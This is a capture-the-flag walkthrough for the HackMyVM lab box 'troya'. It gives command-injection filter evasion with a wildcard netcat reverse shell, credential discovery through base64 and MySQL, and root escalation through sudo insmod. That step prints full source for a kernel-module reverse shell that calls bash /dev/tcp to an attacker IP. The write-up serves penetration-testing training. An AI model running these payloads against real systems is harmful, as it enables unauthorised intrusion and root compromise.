Overview
Multiple steps taken to be root. But all really interesting approach of known concept with a twist. After getting reverse-shell require enumeration to link pieces together to find user helena. The difficult part about the privilege escalation is installing older version of linux header on ubuntu for me.
Box Difficulty | Link |
---|---|
Medium | hackmyvm Link |
Recon
Find all possible open ports on TCP and UDP:
1
2
3
4
5
6
7
8
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# masscan -p1-65535,U:1-65535 192.168.56.33 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-01-04 01:25:44 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 192.168.56.33
Discovered open port 80/tcp on 192.168.56.33
Enumerate ports that were found to be open:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# nmap -sVC -p 22,80 192.168.56.33
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-03 20:31 EST
Nmap scan report for 192.168.56.33
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b0:b8:5e:2c:41:b8:7c:c8:20:e8:09:ff:7a:6f:ff:9f (RSA)
| 256 3f:44:9f:25:14:99:40:17:e0:07:1f:2e:67:de:78:18 (ECDSA)
|_ 256 c4:0e:93:55:b2:7b:8c:86:c3:e4:6d:01:93:60:d2:b1 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:E7:5A:26 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
Begin enumerating port 22 & 80.
HTTP- TCP 80
After enumrating using gobuster and other tools we can only find index.php
which leads to a site which request an IP to query.
Typically in this scenario we usually try to test if there is a valid command injection exploit. Attempting to a command injection exploit test shows that there are non valid character
which were detected. Looks like there are some letters which are not accepted.
Our aim next is to find out all the letters which are not valid. We can make a character text file of all the letters using crunch in char.txt
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# locate charset.lst
/usr/share/crunch/charset.lst
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# crunch 1 1 -f charset.lst lalpha-numeric-all-space-sv -o char.txt
readcharset: File charset.lst could not be opened
The problem is = No such file or directory
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# crunch 1 1 -f /usr/share/crunch/charset.lst lalpha-numeric-all-space-sv -o char.txt
Notice: Detected unicode characters. If you are piping crunch output
to another program such as john or aircrack please make sure that program
can handle unicode input.
Do you want to continue? [Y/n]
Crunch will now generate the following amount of data: 147 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 72
crunch: 100% completed generating output
Next , use burpsuite to execute a intruder attack with a sniper payload with the char.txt
we just created using crunch.
Shell as www-data
We can see that from the output of burpsuite intruder, the non-valid characters are : Non Valid characters : “,%,\,’,*,i,a,s,h,;,<,>,^,`,{,},~,\,\,#,=,&
Commonly, the special characters for to escape the input to execute OS command injection is:
1
2
3
4
5
6
7
&
;
Newline (0x0a or \n)
&&
|
||
`
This means we can only use |
in this scenario to escape the input for the command injection to work.
Additioanlly, to overcome another constraint of letters not being able to use we can use bash question mark ?
Wildcard. **Take note ?
cannot be use for commands!
For example
1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# ls
a.txt bb.txt ccc.txt d e f xx.txt
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# ls ??.txt
bb.txt xx.txt
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# ls ?
d e f
To execute a reverse shell on the website our command will be 127.0.0.1 || nc -e /b?n/b??? 192.168.56.3 1234
On local attacking machine:
1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.33] 58220
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@troya:~/html$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
troya
Shell as helena
Multiple things point to helena access.
- Base64 encoded password
1
2
3
4
5
6
7
8
9
www-data@troya:~/html$ ls
ls
index.php secret.pdf
www-data@troya:~/html$ file secret.pdf
file secret.pdf
secret.pdf: ASCII text
www-data@troya:~/html$ cat secret.pdf
cat secret.pdf
cGF6endvcmQK
Using cyberchef we can see that it is base64 encoded and once decode it is pazzword
.
- mysql running on port 33060
1 2 3 4 5 6 7 8 9 10 11
www-data@troya:/tmp$ bash linpeas.sh bash linpeas.sh ... .... [+] Active Ports [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 423/nginx: worker p tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN 423/nginx: worker p tcp6 0 0 :::22 :::* LISTEN -
- Usernames of users to try from home directory
1
2
3
4
5
6
7
8
www-data@troya:/tmp$ ls -la /home
ls -la /home
total 20
drwxr-xr-x 5 root root 4096 Oct 22 2020 .
drwxr-xr-x 18 root root 4096 Oct 22 2020 ..
drwxr-xr-x 2 hector hector 4096 Oct 22 2020 hector
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 helena
drwxr-xr-x 2 paul paul 4096 Oct 22 2020 paul
After which I try to enumerate the mysql server with the username and password found.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
www-data@troya:/tmp$ mysql -u hector -p
mysql -u hector -p
Enter password: pazzword
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 49
Server version: 10.3.25-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| yo |
+--------------------+
2 rows in set (0.008 sec)
Database changed
MariaDB [yo]> show tables;
show tables;
+--------------+
| Tables_in_yo |
+--------------+
| lucky |
+--------------+
1 row in set (0.000 sec)
MariaDB [yo]> select * from lucky;
select * from lucky;
+----+--------+--------------------+
| id | uzer | pazz |
+----+--------+--------------------+
| 1 | helena | iuyqwejkhdsaiuyewq |
+----+--------+--------------------+
1 row in set (0.000 sec)
Using the credentials:
1
2
3
4
5
www-data@troya:/tmp$ su helena
su helena
Password: iuyqwejkhdsaiuyewq
helena@troya:/tmp$
Shell as Root
1
2
3
4
5
6
7
8
helena@troya:/home$ sudo -l
sudo -l
Matching Defaults entries for helena on troya:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User helena may run the following commands on troya:
(ALL) NOPASSWD: /usr/sbin/insmod
From https://linux.die.net/man/8/insmod : insmod - simple program to insert a module into the Linux Kernel
Which means that it’s possible to use the command insmod to insert a kernel module. Follow the example below to get a reverse shell abusing this privilege. Credit to hacktricks : https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#example-2-with-binary
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Since troya machine is running linux kernel 4.19.0-12-amd64
1
2
3
4
helena@troya:/tmp$ uname -r
uname -r
4.19.0-12-amd64
Our Makefile also has to use linux-headers-4.19.0-12-amd64
.
obj-m +=reverse-shell.o
all:
make -C /lib/modules/4.19.0-12-amd64/build M=$(PWD) modules
clean:
make -C /lib/modules/4.19.0-12-amd64/build M=$(PWD) clean
If your like me and uses ubuntu or other source to build exploit sometimes , below is the steps I used to get the source of the old linux headers.
1
2
3
4
5
6
7
8
9
Put in /etc/apt/sources.list.d/debian-src.list the below:
deb [trusted=yes] https://snapshot.debian.org/archive/debian/20201019T121403Z/ buster main
deb-src [trusted=yes] https://snapshot.debian.org/archive/debian/20201019T121403Z/ buster main
deb [trusted=yes] https://snapshot.debian.org/archive/debian-security/20201019T121403Z/ buster/updates main
deb-src [trusted=yes] https://snapshot.debian.org/archive/debian-security/20201019T121403Z/ buster/updates main
Run in bash:
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 9D6D8F6BC857C906 AA8E81B4331F7F50 7638D0442B90D010 CBF8D6FD518E17E1
apt-get -o Acquire::Check-Valid-Until=false update
After running make
command , transfer reverse-shell.ko
to victim machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
helena@troya:/tmp$ wget http://192.168.56.3:1235/reverse-shell.ko
wget http://192.168.56.3:1235/reverse-shell.ko
--2022-01-05 03:18:27-- http://192.168.56.3:1235/reverse-shell.ko
Connecting to 192.168.56.3:1235... connected.
HTTP request sent, awaiting response... 200 OK
Length: 279832 (273K) [application/octet-stream]
Saving to: ‘reverse-shell.ko’
reverse-shell.ko 100%[===================>] 273.27K --.-KB/s in 0.001s
2022-01-05 03:18:27 (226 MB/s) - ‘reverse-shell.ko’ saved [279832/279832]
helena@troya:/tmp$ sudo /usr/sbin/insmod reverse-shell.ko
sudo /usr/sbin/insmod reverse-shell.ko
Don’t forget to catch the reverse shell!
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root💀kali)-[/opt/hackmyv/troya]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.33] 34110
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@troya:/# whoami
whoami
root
root@troya:/# cat /root/root.txt
cat /root/root.txt
partyishard